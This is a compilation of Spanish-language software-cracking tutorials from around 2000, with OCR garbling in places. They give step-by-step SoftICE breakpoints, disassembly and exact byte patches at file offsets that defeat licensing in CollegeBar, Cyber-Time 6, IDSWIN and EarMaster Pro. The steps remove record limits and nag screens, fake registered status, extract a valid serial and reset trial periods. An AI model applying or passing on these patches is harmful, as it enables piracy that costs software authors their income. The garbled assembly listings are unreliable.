Herramientas: 


el programa es una puñetera base de datos de access pero sepultada en una cienaga de dll's, ocx, y otros 
ejemplares con extensiones todavía más estrafalarias. todos estos archivos lo único que hacen es proporcionar 
una interfaz, que tampoco es nada del otro mundo, y controlar todo el rollo de la ventana de registro, la 
caducidad y todas esas cosas. 


el programa completo es lento de ganas, pierde un tiempo totalmente injusticado en cargarse, deja el registro 
de windows convertido en un bebedero de patos y encima funciona como le da la gana. ¡así que estas son las 
maravillas de la programación en visual basic!, ...apañados estamos. 


al atake 


por delante 


después de configurar concienzudamente softice para meterle mano al visual basic y esperando encontrar algún tipo de 
novedad al final acabamos donde siempre. mucho visual basic y mucha historia, ...para acabar rompiendo en 
kernel!hmemepy. en fin... 


el programa viene con rutinas anti-sice, un chequeo con regmon nos muestra como busca en el registro las claves de 
softice. también viene con varios serial number "trampa" que van apareciendo en el registro eax, después de trazar 
durante bastante rato, que si los introducimos nos llevan a esta divertida ventana antes de que el programa quede 
bloqueado: 


Crack Not Sucessful 


Piracy really hurts author of software, 
Without income this program will not 
be able to be updated in the future. 

So please register, Thank pon 


porque esa es otra, trazar el programa. hay verlo para creerlo. la cantidad de vueltas arriba y abajo que damos 
simplemente para cambiar el nombre de arkanian a a.r.k.a.n.i.a.n es de juzgado de guardia. ¿hay otro camino por donde 
atacar?, ...si, se han dejado la puerta trasera abierta ... 


un vistazo al directorio del collegebar me hizo fijarme en otro archivo situado por encima del archivo msvbvm60.dll, el 
msjet35.dll 


este archivo es el .dll fundamental para que funcionen las bases de datos de microchaf, y si quieres más pistas, cada 
vez que ejecutas el programa y sale la ventana de crack not sucessful aparece en el directorio del programa un archivo 
cuyo icono con su llavecita y su tipo no ofrece lugar a dudas: ''información de bloqueo de registros de microsoft 
access". esto me pasa por no fijarme antes. 


por detras 


así que tenemos una base de datos de access por algún lado...el mejor candidato que tenemos es el collegebar.dat con 
2.150 kb de tamaño. vamos a hechar un vistazo a este archivo. lo abrimos con un editor hexadecimal y obtenemos un 
mensaje de error. no se puede abrir. 


¿el archivo de bloqueo de registro tendrá algo que ver?, por si acaso lo eliminamos ...y obtenemos otro mensaje de 
error, el archivo está siendo utilizado, pues vaya... ctrl+alt+supr y vemos que efectivamente collegebar anda todavía 
en ejecución, le damos a finalizar tarea. 


ahora si, podemos abrir el archivo collegebar.dat con el editor hexadecimal y comprobamos como a partir del quinto 
byte esta la frase standard jet db. una base de datos de access camuflada. copiamos este archivo a otro lugar del disco, 
lo renombramos como collegebar.mdb y hacemos doble click sobre él. access entra en funcionamiento y nos pide una 
contraseña. 


copyright: 
el procedimiento de hallar la contaseña de una base de datos de access lo puedes 
encontrar en los ensayos destripando access 97 de mr. blue, en el ecd. a cada cual lo 


suyo. 


como ya sabes donde consultar, abreviaremos el procedimiento y las explicaciones. access guarda las contraseñas 
encriptadas a partir del byte número 42 contando desde el pricipio del archivo. para comprobar si una base de datos 


tiene contraseña, lo que hace es cargar la base de datos y comprobar a partir de ese byte. 


si lo que encuentra corresponde a una cadena ascii de valor O, eso quiere decir que no hay contraseña. si por el 
contrario lo que encuentra es diferente de O, eso quiere decir que existe contraseña. para ello debe desencriptar esa 
parte del archivo. 


y ahí es donde vamos a meter mano nosotros. vamos a buscar en que direcciones de memoria va cargar nuestra base de 
datos y pararemos la ejecución con el bp adecuado cuando empieze a leer el byte 42. 


cerramos el archivo, nos vamos a access seleccionamos archivo, abrir base de datos, buscamos nuestro collegebar y 
antes de abrir, crtl+d y nos vamos a softice: 


bpx createfilea 

crtl+d, click en abrir, saltamos a softice, 

pulsamos f11 y vemos que eax = al (en mi caso), 

bpx readfile if *(esp+4) == 

pulsamos f5 y vemos que eax = 04154000 (en mi caso), 
be *, 

bpm 04154042 rw 

pulsamos f5, edi = 04154042, 

pulsamos f8 hasta que ebp =0, 


d 04154042, ¡alehop! , la contraseña buscada es..., luke, ..(¿skywalker?). 


con esta contraseña abrimos la base de datos en modo exclusivo, vamos a herramientas, seguridad y anulamos la 
contraseña. 


luego vemos que en la base de datos solo están cargadas las tablas, no necesitamos más. con esto, el subdirectorio 
images y un poco de habilidad nos montamos nuestra propia base de datos para bebidas sofisticadas. ¡y ocupando solo 
3 mb!. no como el programa completo que ocupa una barbaridad. 


puede quedar algo parecido a esto: 


83 Drinks1 


no dudo de vuestra habilidad con access para conseguir resultados espectaculares en cuanto a la presentación, yo solo 
soy un simple aficionado. 


guardamos en lugar seguro nuestra nueva base de datos, si te fijas en la imagen, tienes 4.060 bebidas diferentes para 
hacer, algunas rarísimas. 


después de esto, solo queda desinstalar el collegebar con toda su parafernalia de archivos .ocx, .dll's, vba's y demás 
cosas raras que lo único que hacen es ocupar sitio y que ya no necesitamos para nada. 


¡a vuestra salud! 


karpoff spanish tutor: página dedicada a la divulgación de información en castellano, sobre 


ingeniería inversa y programación. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 


Programa: Cyber-Time 6 (Server) 


PROTECCION: Límete de entradas a 256. Alguna Nag. 

Descripcion: Software para un Cyber Café 

Dificultad: Principiante 

DOWNLOAD: http://www. cybertimesoftware.com 

Herramientas: Softice, DeDe, Wdasm, Editor Hexa. 

CRACKER: KuaTo_ThoR FECHA: 02/11/2000 


introduccion 


muy buenas, nuevamente estoy aquí, para bien o para mal (espero que para bien) :) 


lo primero agradecer al profesor x que me recomendase este programa para hacer el tute, espero que os guste, 
será muy divertido. :-) 


bien, a la hora de instalar el programa, elegir server, ya que el paquete incluye el software del servidor y el de las 
usuarios normales. una vez instalado el programa, vamos a system administator, nos pedirá nombre y contraseña, 
son: admin y password respectivamente. entramos, y donde veamos el nombre y la contraseña los cambiamos, por 
ejemplo, dejadlo en blanco para no perder tiempo, guardamos los cambios. (la verdad es que no admite dejarlo en 
blanco, pero si vamos al archivo 'db cyber-time 6.mdb' y lo abrimos con access o un programa que pueda hacerlo, 
vamos a la tabla 'db globalinformation', y borramos lo que hay, que son nuesto nombre y contraseña, ¡¡menuda 
seguridad!! ;)) 


una cosa que no quería olvidar, en este tutorial, únicamente explico como reventar el server, la workstation os la 
dejo a vosotros, intentadlo y haced un tute, podéis preguntarme cualquier duda. 


una vez hecho esto, estamos listos para comenzar. 


al atake 


preliminares 


ejecutamos el programa, y nos aparece la siguiente ventana: 


eS 


Accounts Manager 


rr 


no sé si la ventana saldrá en el programa registrado, pero desde luego evaluation version no creo que aparezca. damos a 
ok, y nos aparece nuevamente la ventana del login. vemos que por ahí pone unregistered..., no creo que esto aparezca en 
la versión registrada. pulsamos enter, ya que la contraseña es el vacio. 


ahora estamos en la pestaña user accounts, pulsamos add, para añadir un nuevo registro. metemos los datos que 
queramos, y pulsamos save. nos aparece una ventana parecida a la anterior que nos dice que nos quedan 254 registros. 


esto es basicamente lo que tenemos que eliminar o modificar. 


si analizamos el ejecutable con algún programa como gettyp, file inspector, file analizer, veremos que nos dicen que está 
compilado en delphi, y que no está comprimido. 


haced un par de copias del ejecutable principal, y una de ellas ir desensamblandola con wdasm, porque tardará un poco, son 
2mb!!. 


ya que está el delphi, vamos a aprovechar para abrir el programa con el dede, ya sabéis, abrir y luego process. 


vamos a procedures, y vemos que se mueve por allí. lo primero que salta a nuestra vista es: evalexpired_unit, si pulsamos 

sobre ella nos aparecen a la derecha un par de eventos, que no parecen por ahora muy interesantes. si vamos a la principal, 

mainwin_unit, podremos ver que aparecen un montón de eventos, para no volvernos locos, pulsamos sobre event, para que 
se ordenen alfabéticamente. ahora podemos ver alguna cosilla interesante: 


1.- decsaves: pulsando sobre ella podemos ver dentro la frase "mumber of saves remaining =" ¿os suena? :) 


2.- getevaldata: aquí podemos ver entre otras las siguientes cadenas de exto: "evalexpired"; "cyber-time 6.0 
evaluation version. you have "; "unregistered evaluation version - not for commercial use"; interesante ¿no? 


3.- securitycheck: aunque parecía que no quedaba nada, podemos encontrar: "unregistered copy"; "registered copy" 
y nuevamente: "unregistered evaluation version - not for commercial use". ¿qué más podemos pedir? 


=== limite 255 registros ... 


podemos empezar por getevaldata. anotamos la dirección donde empieza, 5551f4, y ponemos un break en sice, 
cargandolo con symbol loader. ponemos bpx 5551f4, damos f5, vemos el programa correr... salta sice !!! vamos traceando 
con f10 buscando algo interesante, hasta encontrar algo aquí: 


:005552c6 eb11 jmp 005552d9 <- aquí saltamos 
:005552c8 e973e3eaff jmp 00403640 

:005552cd 33c0 xor eax, eax 

:005552cf a3582c5600 mov dword ptr [00562c58], eax 
:00555204 e883e7eaff call 00403a5c 


* referenced by a (u)nconditional or (c)onditional jump at address: 
|:005552c6(u) 


| 
:005552d9 833d582c560001 cmp dword ptr [00562c58], 00000001 <- comparación interesante 
:005552e0 7d41 ¡ge 00555323 <- si esmayor o igual a 1 saltamos 


| 
| una vez llegados a 5552d9, ponemos d 562c58 para ver que es lo que contiene. y vemos que contiene fe en hexa, que 

| ¿cuánto es en decimal? pués 254, es decir aquí es donde compara el número de registros que nos quedan,si es mayor o igual 
| a uno salta, si no salta la ventana de expirado. sería un buen lugar para poner un jmp en vez de un jge, pero tengo pensada 

otra cosita, jeje. vamos a ver en qué llamada que lo saca y luego la machacamos, poniendola a 255, así nos aseguramos que 


no haya errores ¿qué os parece? 


| bien, si miramos un poco más arriba, el call más cercano está en 5552b4 (ponemos un break para luego) y vemos esto: 


:005552b1 8b45f8 mov eax, dword ptr [ebp-08] 

:005552b4 e81352ebff call 0040a4cc <-call más cercano 

| :005552b9 a3582c5600 mov dword ptr [00562c58], eax <- ¿os suena 562c58? pasamos el valor de eax a él. 
:005552be 33c0 xor eax, eax 


continuemos traceando para ver que más hace ... llegamos a 55534d y nos salta una ventana diciendos los registros que 
nos quedan, cerramos la ventana, y volvemos a sice. ponemos un break sobre el call, y nos fijamos que algunos valores de 
los registros han cambiado al salir del call, concretamente eax=1. puede que nos sirva para algo o no. bueno, dejamos correr 
al programa y lo cerramos. (borrad lo breaks que ya no sean útilles) 


si volvemos a ejecutar el programa, nos saltará en 5552b4, si ponemos d eax, vemos que aparece 254, en decimal, si 
pasasemos el call, veríamos que eax tiene el valor fe, justo nuestro valor, que luego pasa a 00562c58 en la siguiente 
instrucción. como ya os he dicho lo que pasa, nos colocamos sobre el call, y nos disponemos a escribir un poco de asm, 
escribimos a eip, para meter las instrucciones en la dirección actual. metemos mov eax, ff (255) y pulsamos enter un par 
de veces. podemos ver que ahora se va a ejecutar nuestra instrucción, anotamos sus bytes: 


mov eax, fe -> b8 ff 00 00 00; 


y pulsamos f5 para ver que pasa. nos salta sice en el call de llamada a la nag, dejémosla salir por esta vez, volvemos a pulsar 
f5. y nos aparece la ventana dicendo que nos quedan 255, perfecto !!! 


| ahora hagámoslo permanente con el editor hexa. lo metemos donde lo hemos metido ahora. vamos allí con el editor hexa, y 
metemos los bytes de arriba: b8ff000000. lo metemos en 1546b4 (offset de 5552b4), guardamos los cambios y 

| probamos el programa. sale la nag con 255 registros, y si metemos otro más nos dice que quedan 254, lo cuál dice que el 
255 lo mete en su registro, es decir todo va perfecto. 


«la nag ... 
esto va a ser más corto, aunque no tan bonito ;-) 


| bien, teníamos la nag en 55534d, cargamos con symbol loader, borramos todos los breaks (bc*), y metemos bpx 55534d. 
pulsamos f5 ... y salta sice aquí: 


:0055534a 8b45ec mov eax, dword ptr [ebp-14] 
:0055534d e8aa4bfoff call 0O459efc <- aquí llama a la ventana. 
:00555352 8b45fc mov eax, dword ptr [ebp-04] 
:00555355 8b8070070000 mov eax, dword ptr [eax+-00000770] 


¿probamos a nopear la ventana? vamos a por ella, ponemos a eip, metemos 5 nops, damos f5... y arranca sin problemas, 
incluso podemos volver a meter otro registro, y nos dirá que quedan 254 otra vez. un poco cutre, pero efectivo, jeje. para 
hacerlo permanente, nuevamente cogemos el editor hexa, el offset es 15474d. 


para los que no les gusten los nops: 


bien, hay por ahí un ret, !! llamémosle !!. la dirección de un ret es 555d91 y el offset de 55534d ya lo sabéis. el resto os lo 
dejo a vosotros. 


... SAves remaining ... 


vamos a ocuparnos de esta nag, luego iremos a por el unregistered. 


en el dede, pulsamos un par de veces sobre decsaves, y nos aparece el código, vemos por ahí, "number of saves 
remaining:". esta es nuestra frase. vamos a poner un par de breaks, uno al comienzo y otro al final: 


| 
| 
| 


| 00550284 55 push ebp <--- principio 
| 00550285 8bec mov ebp, esp 


| 00550326 ba02000000 mov edx, $00000002 
| 0O5503ab eSac3bebff call 0O403f5c 
005503b0 c3 ret <--- final 


| por tanto, vamos al symbol loader, si aún tenemos breaks anteriores los borramos, y metemos esos dos, bpx 550284 y bpx 
|5503b0. el primero únicamente para ver que es lo que hace el programa por ahí, simple curiosidad. bien, damos a la ruleta, 
| esperamos, metemos un nuevo registro, ddamos a save... y salta sice. justo en el principio, que casualidad ;-) 


| continuemos, traceamos con f10, viendo que pasa por ahí, por ejemplo en 5502d6, vemos un mov eax, [00502c8], al pasarlo 
| vemos que el valor de eax pasa a ser fe (en decimal es 254). nuestra ventana tiene que estar cerca. seguimos con f10 hasta 
| que al llegar a 55037c, aquí salta la ventana. podríamos intentar machacarla aquí, pero mejor lo hacemos en su llamada 

| 'madre', seguimos, hasta que llegamos a ret, pulsamos f10, otro ret, y aparecemos aquí: 


| :0054fb99 Of8529ffFFff ¡ne O0O54fac8 

:0054fb9f 8b45fc mov eax, dword ptr [ebp-04] 

| :0054fba2 e8dd060000 call 00550284 <- esta es nuestra llamada 
| :0054fba7 33c0 xor eax, eax <- aquí aparecemos 

| :0054fba9 5a pop edx 

:0054fbaa 59 pop ecx 


| ahí está nuestra llamada, al salir de ella podemos mirar que valores de los registros han cambiado, concretamente podemos 
| ver que eax vale O (si no veis los registros, pulsad f2). así que metemos un break en el call, reiniciamos el programa, 

| metemos un nuevo registro, y ... salta sice en nuestro call. vamos a sustituirla por un mov eax, 00. metemos a eip, para 

| escribir asm en la dirección actual, metemos mov eax, 00 y pulsamos un par de veces enter, vemos que el call se ha 

| transformado en un mov, pulsamos f5 para volver a windows ... y el programa va de maravilla, prueba superada :-) 


| para hacer los cambios permanentes, utilizamos el editor hexa. mov eax, 00 -> b800000000. el offset es: ... bueno, 
| buscadlo vosotros, que ya deberíais saber :) 


| nota: fijaos que mov eax, ttxxyyzz en bytes siempre se escribe igual, comenzando por b8, y a continuación el valor 
| cambiando los bytes de orden, así: zzyyxxtt. es decir un mov eax, ttxxyyzz -> b8zzyyxxtt 


Unregistered. 


| eso es, queda el mensaje de unregistered que aparece al arrancar el programa. como vimos en el dede, aparece al 
| menos en dos sitios. si miramos en wdasm, veremos que sólo son esos dos sitios. 


la que aparece en getevaldata es la que a nosotros nos intersa.y en securitycheck aparece registered copy. 


| debemos recordar que es lo que queremos, únicamente nos queda eliminar una frase, y cambiarla por otra. esto con un 
| editor hexadecimal, está hecho, sólo tenéis que buscar la frase (como ansi) y modificarla por lo que queráis. 


| pero podemos hacerlo cambiando una cosa, veamos donde aparecen ambas frases: 
|* possible string reference to: "registered copy" 
| 00555b6a bac45d5500 mov edx, $00555dc4 


| * possible string reference to: "unregistered evaluation version - n 
|| ot for commercial use" 


Ñ 
|0055535b ba18545500 mov edx, $00555418 


|los números resaltados, son las direcciones de ambas cadenas, ¿qué sucede si cambiamos 555418 por 555dc4? que 
| aparecerá la frase registered copy en lugar de unregistered... 


cogemos el offset de 55535b que es 15475b, vamos al editor hexa, y cambiamos ba18545500 por bac45d5500 
| (00555dc4), bonito colorido ;-), recordad que hay que invertir el orden al meter los bytes. 


finalizando 


creo que con esto ya hemos hecho una buena simulación de registro del programa ¿no? si alguien logra hacerlo mejor 
que me lo mande. 


bueno esto ha sido todo por esta vez, espero no haberme equivocado mucho, si encontráis cualquier error, o tenéis alguna 
pregunta no dudéis en decírmelo. espero que os haya resultado útil este tute. no olvidéis que nuestro objetivo sólo es 
aprender. sin contar con la diversión que esto supone por supuesto ;-)) 


aprovecho para mandar un saludo a todos los que me habéis escrito como cosecuencia directa de mis tutes, en especial para 
nandois y para javier. y como siempre un gran saludo para todos los miembros de [k-for] y de tutoriales 2000. parece la 
despedida de un concurso de la tele, jeje. 


hasta la próxima... 
«roza » 


mi correo: kuato_thortdhotmail. com 


la página de [k-for]: http: //pagina.de/kfor 


«orar » 


karpotff spanish tutor: 


pagina dedicada a la dibulgacion de informacion en castellano, 
ingenieria inversa y programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 


Programa: IDSWIN WIN 95/98/NT 


PROTECCION: Licencia/Serial Number. 

Descripcion: Programa de Contabilidad y Gestión Multiempresa 
Dificultad: Novato, Facililla, Media, ETC 

INFORMACION: http://distrito.com/ids 

Herramientas: Numega SoftICE v.4.05, GetTyp v.2.06, Dede v.2.34 
CRACKER: +Erfser FECHA: 30/10/2000 


introduccion | 


el prorama ''no es necesario" para seguir este tutorial. mi intención es solamenente enseñar esquemas de protección 
genéricos empleados por los programadores de aplicaciones comerciales. se trata de software comercial "difícilmente" 
disponible en la red si sabes como buscar. aunque podemos conseguir una versión ''demo"' a través de las distintas técnicas 
de "ingeniería social" este no es lugar ni el momento de explicar las distintas técnicas, de este "maravilloso-arte". en mis 
archivos personales de software ''solo con fines educativos:)'' dispongo de la versión 97.1 para win95, programa de 
contabilidad y gestión multiempresa, realizado por la empresa ids - informática del segura, s.l. en su página web, podemos 
leer algo como esto : 'este programa es uno de los siete mejores de españa, según la revista pcmedia'' y me pregunto : 
nos podemos fiar de la opinión de los maravillosos técnicos de la revista pemedia? 


en este caso, aunque parezca extraño es un programa bastante bueno, sencillo e intuitivo, desde aqui mis "felicitaciones" a los 
programadores por su aplicación, aunque un suspenso en su rútina de protección. 


primeramente necesitaremos tener las ideas muy claras de como atakar a este programa, realizado en delphi (q:¿cómo 
sabemos en que lenguaje esta realizado?, a: gettyp). una vez sabiendo en que lenguaje podemos descompilarlo, en este 
caso, empleamos otra maravillosa utilidad llamada, dede 3.45 ( o sino generamos un listado muerto con el win32dasm ). 


la información que obtendremos la podemos utilizar más tarde, para realizar una segunda aproximación, es decir, realizar un 
keymaker (o generador de llaves) para el programa. 


aaaaaaaltooo00000!!!!!!! 


podiamos seguir hablando y hablando, donde realiza el salto (jne,je,jz,jnz...) o hace la comparación en esta dirección, la 
rútina de generación es así, etc... pero por falta de tiempo y "ganas" solo voy a dedicarme a encontrar el n*serie válido, 
aunque quien sabe, algun día ... ;) 


sólo necesitamos paciencia, materia gris, un paquete de tabaco, y un vodka-naranja, para averiguar el n“serie válido para la 
licencia. 


instalamos el programa idswin versión ''demo"', nos creara una serie de carpetas, el programa ejecutable lo encontramos en 
la carpeta siguiente: WdswinigeneralN 
ManNte.eXe <onommnm==- programa "victima" 


el programa nos generara una licencia determinada dependiendo de las caracteristicas internas de nuestra máquina (nombre 
de pc, tipo de procesador, etc... supongo:) 


en este caso licencia = dsisrvuw 


al atake 


primera aproximación : arrancamos nuestra "victima" con la herramienta apispy32 v2.4 para averiguar la api a establecer 
el bp (breakpoint), en nuestro caso es (como en otros tantos ;)) 


¿sj APIS32 v. 2.4 - Registered to +Erfdser a ES | 
Examining Application StartUp 


[C-IDSWINYGENERAL mante. exe JN [Y On Top [7 Pause 
Command Line Arguments: | 


Follow API functions are spied 


132: RegDpenKeya [ HANDLE, LPSTR, LPDATA ] 
: RegOpenKeyExá [ HANDLE, LPSTR, DWORD, DWORD, LPDATA ] 
: RegOpenKeyExw [ HANDLE, LPWSTA, DWORD, DWORD, LPDATA ] 
: RegOpenKeyw' [ HANDLE, LPW'STR, LPDATA ] 
:_hread [ HANDLE, LPDATA, DWORD ] 
: _hwrite (HANDLE, LPSTR, DWORD ] 
¿_lclose [ HANDLE ] 
¿_lereat [LPSTR, DWDRD ] 
:llseek [ HANDLE, DWORD, DWORD ] 
:_lopen [LPSTR, DWORD ] 
:_lread [ HANDLE, LPDATA, DWORD ] Add 
: _lwrite [ HANDLE, LPSTR, DWORD ] 
KERNEL32: CreateFilea ( LPSTR, DWORD, DWORD, LPDATA, DWORD, DWORD, HANE Del 
KERNEL32: CreateFileMappingá [ HANDLE, LPDATA, DWORD, DWORD, DWORD, LPST _ 
KERNEL32: CreateFilew [LPWSTR, DWORD, DWORD, LPDATA, DWORD, DWORD, H£ 
KERNEL32: CreateMailslotA [ LPSTA, DWORD, DWORD, LPDATA ] 4 DeLAl 


About 


Ej APIS32 y. 2.4 - Registered to +Er(Mser 


0042606C:CreatellindowExA = 640 

00426067: CreatellindowExA (DWORD: 00000000,LPSTR:O0A3FCES: "TBitBtn",LPSTR:( 
0042606C:CreatellindowExA = 644 

00426067: CreatellindowExA (DWORD: 00000000,LPSTR:O0ASFCES: "TBitBtn",LPSTR:( 
0042606C:CreatellindowExA = 648 

00426067: CreatelindowExA (DWORD: 00000200,LPSTR:004A3FCE4: "TEdit" ,LPSTR:00( 
0042606C:CreatellindowExA = 640 

00426067: CreatelindowExA (DWORD: 00010000,LPSTR:O0ASFCFC: "TPanel” ,LPSTR: 0: 
0042606C:CreatellindowExA = 66€ T 


f ¿| IDSWIN! GENERAL mante. exe 
Options 
| Save LOG Clear | Exit | 


(+) createwindowexa (user32.dll) 


Examining Module 


partiendo de que tenemos residente el softice en nuestro sistema, ejecutamos la "victima" nos aparece una pantalla : 


Numero de Usuario: LALO | numer EI] 
o 


A d 
NA ccedera en modo demo 


antes de pulsar el boton [aceptar] activamos el softice (ctrl+d) y establecemos el breakpoint, 'bpx createwindowexa' 
(porque de lo contrario nos aparecera el aviso 'accedera en modo demo""), regresamos a nuestra "victima" pulsando de 
nuevo (ctrl+d), ahora es el momento que debemos pulsar el boton [aceptar]. pantallazo y aparecemos dentro del softice 
pulsamos la tecla de función [£12] para que nos salte a la rutina del programa que llama a esta api. 


veremos algo asi: 


eax=000008ec ebx=0023f524 ecx=80004f40 edx=80005260 esi=0139b5ac 
edi=0139b878  ebp=00a3f4d8  esp=00a3f494  eip=0042606c  odiszapce 
es=017f ds=0187 ss=0187 es=0187 fs=12bf gs=0000 ds:0139b678=000008ec 
*eax=21c 

*ebx=0 

*“ecx=80005260 

*esi=468d2c 

017£:00426067  eS340efeff call user32!createwindowexa 

0171£:0042606c S986cc000000 mov [esi+000000cc], eax <---- aquí aparecemos;) 


017f:00426072  5e pop esi 
017f:00426073 5b pop ebx 
017f:00426074  c3 ret 


visualizamos el registro esi pulsando en la pantalla de registros del softice con el botón derecho del ratón y seleccionando - 
display, avanzamos sobre la pantalla de datos, bien con el ratón o pulsando [repág] hasta ver algo curioso, como esto: 


e A A 
0187:01398efc 3036 3137 3233 3234 0037 0000 00la 0000  607132427.........cuc.moo.o 
0187:01398e0c 0001 0000 0009 0000 3a43 495c 5344 4957 — ....... co didswWi.........oo. 
0187:01398elc 004e 0139 0026 0000 7lac 0041 44b0 0042  n.9.%....qa..db.......... 
0187:01398e2c b5ac 0139 b8d8 0139 0000 0000 0008 S000 A A 
0187:01398e3c 0060 0000 0000 0000 0012 0000 0001 0000 — PT oonnnnnnnnninocinonnmo........ 
0187:01398e4c 0003 0000 504f 0035 8f54 0139 8f54 0139  ....op5.t.9.t.9....o..... 
0187:01398e5c 0010 0000 0010 0000 001b 0000 0001 0000 — .nnnonnnnnnnnonccnnonnocooocooo00... 


0187:01398e6c 000b 0000 4452 424e 5348 4845 4f53 0051  ....rdnrhsehsoq. 


pues ya esta, ya tenemos nuestro n/serie=rdnrhsehsoq para la licencia=dsisrvuw que nos genera el programa mante.exe, 
fácil no!!! 


un saludo! 


+erOser'2000 
for the new millennium 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 
ingenieria inversa y programacion. email "colabora con tus proyectos" 


Programa: 


PROTECCION: 
Objetivo: 
Descripcion: 
Dificultad: 
DOWNLOAD: 
Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 


EarMaster Pro 4.0 


Versión de Evaluación (25 días) Nombre/N” de Serie y Nag inicial 


Simular estar registrado 


Shareware Educativo (Entrenamiento del oído musical) 
Principiante 


http: //www.earmaster.com 


SoftICE 4.x, RegFix, Editor Hexadecimal, W32Dasm (opcional) 
frantic FECHA: 01/11/2000 


introduccion 


a este programa creo que merece la pena dedicarle unos minutos para conocerlo. es para el aprendizaje musical 
práctico, para trabajar el oído. no di con él por casualidad, sino que lo hallé porque suelo usar ese tipo de software 
mientras las condiciones de evaluación lo permiten... y ya que lo tenía, se me ocurrió analizar, en la medida de mis 
posibilidades, sus protecciones. insisto en que lo considero altamente recomendable para todos aquellos que estén 
estudiando música o quieran trabajar su oído musical. más que nunca hay que señalar que, por respeto a los autores, 
no hay que desprotegerlo más allá de lo necesario para nuestros fines educativos. 

en otras palabras, el valor de este shareware excede al de su condición de “víctima”, como solemos decir. bien, 
vosotros veréis qué hacéis después de leer esto. siempre el mismo consejo: pagad por él si os interesa y si podéis 
permitiroslo. ah, y el programa está en español, salvo la ayuda. 


los pasos para desproteger esta pieza vienen a ser estos: 
* introducir unos datos para matricularlo y provocar así la aparición del mensaje “este no es un número de 


registro válido” 


* localizar las rutinas de protección con softice 

* aislar la variable responsable de la condición “usuario registrado” 

* modificar el código en el punto preciso para que el programa asuma en todo momento dicha condición. 
por tanto, este tutorial es del tipo “simular estar registrados”. 
este escrito está especialmente dirigido a principiantes con cierta experiencia en el uso de las herramientas del 
"oficio". por eso no voy a entrar en detalles acerca del manejo de las mismas, salvo en aquellos puntos que considere 
puedan tener cierto interés. 


al atake 


la instalacion 

antes de instalar la aplicación usé installwatch para sabér qué archivos y entradas del registro se creaban, borraban o 
modificaban. teniendo herramientas como apispy 32, regmon y filemon no merece mucho la pena esperar todo ese tiempo 
que los programas tipo installwatch precisan para “sacar una foto” del disco duro antes de instalar, y otra despúes. 
installwatch presenta una ventaja: analiza a la vez ficheros corrientes y entradas del registro. pero también hay otra pega: 
muchas aplicaciones generan o modifican archivos y/o entradas del registro tras usarlos por primera vez y no en el proceso 
de instalación. y earmaster es uno de ellos. teniendo en cuenta esa posibilidad usé regfix. este es un programa que toma una 
instantánea del registro en un momento dado y otra después y las compara, de modo que se puede sabér qué entradas han 
sido creadas, modificadas y eliminadas. 

una foto antes de ejecutar por primera vez el programa... y otra tras cerrarlo... uhmmm... una entrada creada: smidxpd/ emv 
(¿será por lo de earmaster versión 4?) en efecto, esta entrada es la encargada de controlar los días que llevamos de 
evaluación. si adelantamos el reloj del ordenador para caer fuera del periodo de evaluación, ejecutamos el programa y luego 
lo volvemos a retrasar, el programa se da cuenta y nos deja fuera de juego. si se borra esta entrada, volveremos a disfrutar del 
periodo entero de evaluación. en esta entrada se guardan codificadas las dos últimas fechas de ejecución del programa. 
antes de comenzar con la tarea, conviene ejecutar el programa para configurarlo correctamente y que no nos aparezcan esas 
pantallas en pleno fregado. se trata de proporcionar un nombre, verificar el sonido y elegir el nivel de dificultad de los 
ejercicios. 


echando un vistazo 

al ejecutar el programa aparece una nag que permanece, sin poderlo remediar, unos segundos y que nos recuerda que se trata 
de una copia no registrada y de evaluación. nos ocuparemos de ella más adelante porque ahora vamos al meollo del esquema 
de protección. al desaparecer la nag, el programa nos ofrece la posibilidad de ingresar un nombre y un n” de serie, lo cual ya 
es mucho porque nos evitará tener que “personalizar” títulos de ventanas y demás detalles que hay que pulir cuando lo único 
que se puede hacer es prolongar el periodo de evaluación y no nos podemos librar de la condición de no-registrados. 
escribimos nuestros datos y, antes de pulsar el botón, vamos a softice y ponemos un par de breakpoints (messageboxa, 
getdlgitemtexta). no pasa nada. 

plan b: bpx hmemcpy. softice salta y pulsamos f12 hasta llegar al código de earmaster (está escrito sobre la línea verde de la 
"code window"). hemos aterrizado en un punto lejano porque se ven varios pop (registros restaurados antes de regresar a la 
rutina superior) seguidos de ret. vamos dando f12 para llegar hasta el final de las correspondientes subrutinas, hasta que 
aparecemos en :004d6a7c call 4e8a38. aquí ya se ve que estamos en algo importante. quitamos el bpx hmemcpy y f3 para 
que se siga ejecutando el programa y salir de softice. 

así aparece en w32dasm la parte correspondiente en el listado muerto: 


* referenced by a (u)nconditional or (c)onditional jump at address: 


1:004d69c1(c) 

| 

:004d6a4e  8b86f8020000 mov eax, dword ptr [esi+000002f8] 
:004d6a54  80b8f401000000 cmp byte ptr [eax+000001f4], 00 
:004d6a5b 08490000000 je 004d6af1 

:004d6a61  8b8600030000 mov eax, dword ptr [esi+00000300] 
:004d6a67 8b10 mov edx, dword ptr [eax] 
:004d6a69  ff92b8000000 call dword ptr [edx+000000b8] 
:004d6a6f 84c0 test al, al 

:004d6a71 747e je 004d6afl 

:004d6a73  8d55f4 lea edx, dword ptr [ebp-0c] 
:004d6a76 8b8610030000 mov eax, dword ptr [esi+00000310] 
:004d6a7c esb7eTf5ff call 00435238 

:004d6a81  8b45f4 mov eax, dword ptr [ebp-0c] 
:004d6a84 es47190100 call 004e83d0 

:004d6a89 8b151c0d5200 mov edx, dword ptr [00520d1c] 
:004d6asf 8802 mov byte ptr [edx], al 

:004d6a91 all1cOd5200 mov eax, dword ptr [00520d1c] 
:004d6a96 803800 cmp byte ptr [eax], 00 

:004d6a99 7433 je OO4d6ace 

:004d6a90b aldc155200 mov eax, dword ptr [005215dc] 
:004d6aa0  c60000 mov byte ptr [eax], 00 

:004d6aa3 8d55f4 lea edx, dword ptr [ebp-0c] 
:004d6aa6  8b8608030000 mov eax, dword ptr [esi+00000308] 


:004d6aac es87e7f5ff call 00435238 


:004d6ab1  8b45f4 mov eax, dword ptr [ebp-0c] 
:004d6ab4 50 push eax 

:004d6ab5  8d55f0 lea edx, dword ptr [ebp-10] 
:004d6ab8 8b8610030000 mov eax, dword ptr [esi+00000310] 
:004d6abe es7Se7f5ff call 00435238 

:004d6ac3  8b45f0 mov eax, dword ptr [ebp-10] 
:004d6ac6 Sa pop edx 

:004d6ac7 es6c1f0100 call 004e8a38 

:004d6acc eb23 jmp 004d6af1 


